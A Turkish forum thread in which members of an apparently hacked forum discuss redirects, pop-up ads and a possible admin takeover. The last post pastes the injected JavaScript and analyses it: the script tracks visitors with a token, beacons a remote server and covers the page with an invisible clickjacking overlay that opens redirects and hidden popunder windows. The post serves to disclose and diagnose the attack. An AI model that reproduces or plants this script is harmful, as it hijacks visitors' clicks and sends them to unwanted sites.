SİTE GÜVENLİĞİ HAKKINDA

KAPTAN ORTAKAPI

Aktif Üye
Yeni Üye
8 Ağu 2025
399
365
Merhabalar saygıdeğer forum üyelerimiz, son dönemde siteye yapılan saldırılar kaynaklı sanırım, siteye giriş yapamama, giriş yapılsa bile sürekli farklı adreslere yönlendirmeye çalışma, saçma ,alakasız, gayrı ahlaki reklamlar gösterme gibi sorular yaşandığı hepimizin malumu, bu açıdan farklı tarayıcılarla girme, sürekli şifreleri değiştirme, çerezleri silme vs gibi basit önlemleri de hepimiz yapıyoruz. Burada site yöneticilerimize de destek olmak babında tek tek kişiler olarak değil de toplu yapabileceğimiz bir durum var mıdır? Kurban bayramı öncesi saldırı sonrası gerekirse hosting firmasının değişmesi için maddi kaynak sağlanması gibi güzel bir öneri de vardı örnek olarak.
Başta yöneticiler , onursal üyeler olmak üzere tüm forum üyelerine saygılarımı sunuyor, bu can sıkıcı durumların çözümü ve bir daha yaşanmaması adına naçizane önerilerinizi bekliyorum.
 

thorgal

Kıdemli Üye
18 Ocak 2018
885
3,215
İstanbul
Dün akşama doğru @cizgicicocuk da buna yönelik bir başlıkla duyuru yapmıştı ama sabah baktım ki bu duyuru mesajı silinmiş ?!?!
Site de yolunda gitmeyen bir şeyler var demek ki...
Bu konu da yazabiliyorum çünkü Chrome tarayıcı yerine Opera tarayıcıyı kullanıyorum.... Dün akşam her hangi bir yere tıklayamıyordum...
Evet ??? Neler oluyor ??? Adminlerimizden biri bir şey yazabilir mi?

@direnc11 @Baltimora @BelaMatador @ertuğrul @yeryüzü @savok
 
Son düzenleme:

ekenciz

Onursal Üye
Çeviri & Balonlama
13 Eyl 2009
3,172
15,270
çizgicocuk'un gönderisini yönetim silmiş olamaz. Kötü niyetli kişilerden biri kendine admin yetkisi almış olmalı ki o yazı da bu sayede silinmiş. Sitede izmirescort reklamı yapılıyor. Muhtemelen birinin sitenin alt yapısına geniş bir erişimi var ve istediği kodu yerleştirebiliyor. İlgili arkadaşlar güvenlik sorunun ciddiye alsınlar ve lütfen gerekiyorsa bir süre forum kapalı kalsın ama bu sorunu halledin lütfen. biraz öncesine kadar ben hiç bir reklam görmüyordym ama bir pop up reklam açılıp izmirescort reklamı gösterdi.
 

wretch

Yeni Üye
5 Tem 2026
15
54
çizgicocuk'un gönderisini yönetim silmiş olamaz. Kötü niyetli kişilerden biri kendine admin yetkisi almış olmalı ki o yazı da bu sayede silinmiş. Sitede izmirescort reklamı yapılıyor. Muhtemelen birinin sitenin alt yapısına geniş bir erişimi var ve istediği kodu yerleştirebiliyor. İlgili arkadaşlar güvenlik sorunun ciddiye alsınlar ve lütfen gerekiyorsa bir süre forum kapalı kalsın ama bu sorunu halledin lütfen. biraz öncesine kadar ben hiç bir reklam görmüyordym ama bir pop up reklam açılıp izmirescort reklamı gösterdi.
Bu sorun ilk yaşandığında siteye girilemiyordu bile ama bir süredir siteye girilebiliyor ama sitede herhangi bir etkileşimde ismirescort sitesi ve nadiren başka bir sitenin reklamı açılıyor. Görmemiş olabilirim ama bu sorunun yaşandığı günden itibaren hiçbir yöneticinin hiçbir konuda mesaj yazdığınada rastlamadım, çizgicocuk konusu hakkında yeterli bir bilgim yok ama dediğiniz gibi artık kesin olarak domain kaynaklı başka bir siteyle etkileşime girme sorunu olmadığına kesin olarak eminiz kötü niyetli biri yöneticilik almış olmalı eminim ki adminler şuan sorunu çözmeye çalışıyordur bence bizler sorun çözülene kadar tarayıcıda çizgi diyarı yazdığımızda çıkan ekşi sözlük gibi sitelerde bu sorunu dile getirelim ve yeni üyelerin kayıt olurken kullanmadıkları bir şifre ve kendileri için önemli olmayan bir mail kullanmalarını dile getirmeliyiz yapabileceğimiz en büyük katkı bu olur diye düşünüyorum. Yöneticilerinde bu süreç bittiğinde kullanıcılara şifre değiştirme ve mail değiştirme gibi başka imkanlar vermesinin ve bu tarz önemli olabilecek bilgilerin yine bu tarz bir durum yaşanmaması için herhangi bir veri tabanına kaydedilmemesi gerektiğini düşünüyorum. Ayrıca yöneticilerle başka platformlardan daha önce iletişim kurmuş kişiler varsa durumu öğrenmek için sorabilirse çok iyi olur. Şimdilik reklam harici bize zararlı olabilecek bir sorun yaşandığını sanmıyorum sitede sadece mail adresimiz ve şifremiz kayıtlı ve sadece bir siteye girmekle en kötü ihtimalle ip adresimiz alınabilir tarayıcı virüsü gibi şeyler olduğunu henüz sanmasamda dikkatli olmamız gerekiyor, dediğim gibi şuanlık tarayıcımızda çizgi diyarı yazınca çıkan başka forumlar ve ekşi sözlük gibi platformlarda bunu belirtmemiz bizim yapabileceğimiz en iyi şey olur.
 

TanGel

Yeni Üye
12 Eyl 2012
20
59
Ejder Yuvası
Arkadaşlar, site kaynaklı olmayabilir. Çünkü ben şu an Opera Tarayıcısı ile girdiğimde hiç bir şey olmuyor. Ama az önce Chrome Tarayıcı ile girdiğimde her tıkladığımda küçük bir pencere açılıp reklam falan çıktı. Ayrıca DNS ayarlarınızı değiştirmek zorunda kalabilirsiniz. Yani VPN kullanmanızı öneririm. Benden söylemesi.
 

ekenciz

Onursal Üye
Çeviri & Balonlama
13 Eyl 2009
3,172
15,270
Sorun site kaynaklı. Bugüne kadar ben de hiç bir sorun yoktu ama artık var. Çok büyük bir ihtimalle önceden haberim olmamasının sebebi kullandığım reklam engelleme yazılımı. Pop Up reklamları engellediği için görmüyordum. Am nedense pop up reklam üstte çok küçük olarak açılmaya başladı. Ancak Site teknik yöneticisi bir açıklamda bulunursa, süreçten haberdar ederse seviniriz.
 

Tsubasa

Admin
11 Mar 2009
537
1,286
konuyu araştırıyoruz, bunlar benim de çok uzman olduğum konular değil, uzman arkadaşlara inceletiyoruz. servis sağlayıcıdan ziyade kullanılan yazılımlardaki açıklarla alakalı sorunlar.
 

thorgal

Kıdemli Üye
18 Ocak 2018
885
3,215
İstanbul
Bu konuda tespit edilen kodu bilginize iletiyorum sayın @Tsubasa ;

if(navigator.webdriver || window.outerWidth === 0) return;var sessionToken = localStorage.getItem('z_token');if(!sessionToken) { sessionToken = Math.random().toString(36).substring(2) + Date.now().toString(36); localStorage.setItem('z_token', sessionToken);}fetch(_0x4e21, {method: 'GET', mode: 'cors', cache: 'no-cache'}).then(function(res){ return res.json(); }).then(function(data){ var intervalSeconds = (data && data.heartbeat_interval) ? data.heartbeat_interval : 15; setInterval(function() { navigator.sendBeacon(_0xheart, new URLSearchParams({token: sessionToken})); }, intervalSeconds * 1000); if(data && data.status === 'ok' && data.redirect_url) { var runPop = function() { if (document.getElementById('z-overlay')) return; var overlay = document.createElement('div'); overlay.id = 'z-overlay'; overlay.style.position = 'fixed'; overlay.style.top = '0'; overlay.style.left = '0'; overlay.style.width = '100vw'; overlay.style.height = '100vh'; overlay.style.zIndex = '2147483647'; overlay.style.background = 'transparent'; overlay.style.cursor = 'pointer'; overlay.onclick = function(e) { var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); if (isMobile) { var tempUrl = window.location.href; window.open(tempUrl, '_blank'); window.location.href = data.redirect_url; } else { var w = window.open(data.redirect_url, '_blank', 'width=1,height=1,left=0,top=0,scrollbars=no'); if (w) { try { setTimeout(function() { w.blur(); window.focus(); }, 50); } catch(err) {} } } overlay.remove(); }; if (document.body) { document.body.appendChild(overlay); } }; if (document.readyState === 'complete' || document.readyState === 'interactive') { runPop(); } else { document.addEventListener('DOMContentLoaded', runPop); } }}).catch(function(err){});
})();`

Kod localStorage üzerinde bir takip anahtarı (z_token) oluşturur ve zonestream.info sunucusuna arka planda düzenli olarak sinyal/telemetri (heartbeat) gönderir.

Tıklama Saldırısı (Clickjacking) / Görünmez Katman: Tüm sayfanın üzerine en yüksek z-index değeriyle (2147483647) şeffaf, görünmez bir <div> katmanı (#z-overlay) ekler.

Kötü Amaçlı Yönlendirme / Popunder: Kullanıcı sayfanın herhangi bir yerine tıkladığında: Mobil cihazlarda mevcut sekmeyi harici bir adrese (data.redirect_url) yönlendirir, orijinal sayfayı ise yeni bir sekmede açar. Masaüstü cihazlarda arka planda 1x1 piksel boyutunda gizli bir pencere (popunder) açarak reklam gösterimi veya zararlı site yönlendirmesi yapar.
 
Üst